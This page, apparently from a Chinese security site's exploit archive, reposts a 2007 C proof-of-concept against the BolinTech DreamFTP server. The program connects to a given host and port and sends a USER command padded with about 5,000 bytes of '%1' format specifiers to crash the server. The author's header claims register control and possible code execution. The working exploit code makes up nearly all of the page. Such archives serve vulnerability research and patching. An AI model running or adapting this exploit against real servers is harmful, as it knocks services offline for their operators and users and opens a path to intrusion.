首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BolinTech DreamFTP (USER) Remote Buffer Overflow PoC
来源:Marsupilamipowa@hotmail.fr 作者:Marsu 发布时间:2007-01-15  

/**************************************************************************
*BolinTech DreamFTP USER buffer overflow *
* *
*The server does not correctly handle format string so sending a command *
*like USER %1*3000 let us own EDX. Other values can also affect EAX & ECX *
* *
*This is only a POC but code execution is possible *
* *
*usage: dreamftp.exe ip port *
* *
*Coded by Marsu <Marsupilamipowa@hotmail.fr> *
**************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[5003];
int buflen=5000;// edx=31253125
int i;

if (argc!=3)
{
printf("[+] Usage: %s <ip> <port>\n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa);

printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf("Failed\n[-] Could not init gethostbyname\n");
return 1;
}
if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("Failed\n[-] Socket error\n");
return 1;
}

sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(atoi(argv[2]));
sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(sock_addr.sin_zero), '\0', 8);
if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
return 1;
}
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0);

printf("[+] Building payload ... ");
for (i=0;i<buflen;i+=2) {
memcpy(evilbuff+i,"%1",2);
}

memcpy(evilbuff,"USER ",5);
memcpy(evilbuff+buflen,"\r\n\0",3);
printf("OK\n[+] Sending USER ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0);
Sleep(1000);
printf("[+] Host should be down\n");
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sami FTP Server 2.0.2 (USER/PA
·VLC Media Player 0.8.6a Unspec
·WFTPD Pro Server <= 3.25 SI
·Mac OS X 10.4.8 AppleTalk ATPs
·JV2 Folder Gallery 3.0 (downlo
·Kaspersky Antivirus 6.0 Local
·ThWboard <= 3.0b2.84-php5 S
·TFTPDWIN 0.4.2 Remote Buffer O
·FdWeB Espace Membre <= 2.01
·KGB <= 1.9 (sesskglogadmin.
·DigiAffiliate <= 1.4 (visu_
·Mac OS X 10.4.8 Overwrite Setu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved